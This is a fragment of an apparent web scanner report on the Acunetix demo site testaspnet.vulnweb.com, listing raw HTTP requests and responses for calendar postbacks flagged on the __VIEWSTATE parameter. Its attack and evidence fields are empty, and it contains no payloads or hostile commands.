Request Body - size: 1,071 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8376&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEDm%2B%2BXX2ghkZGTPIOVuVUomEN382t6tcNEQAWfCuA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLIr%2BGjAwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6wj%2F1Sd9n%2BbHcuFkQLYt4wm%2Fb2
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:14 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEDm++XX2ghkZGTPIOVuVUomEN382t6tcNEQAWfCuA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLIr+GjAwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6wj/1Sd9n+bHcuFkQLYt4wm/b2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:White" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8379&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIAje0Ha2ghkZGQ8OOYv%2BUfYv48ocjatybkLtDU3YA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKM38ihBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKqFHMOff2%2Bz9Ql0Baxq4z1jQaOR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:59 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIAje0Ha2ghkZGQ8OOYv+UfYv48ocjatybkLtDU3YA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKM38ihBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKqFHMOff2+z9Ql0Baxq4z1jQaOR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:White" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1061 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
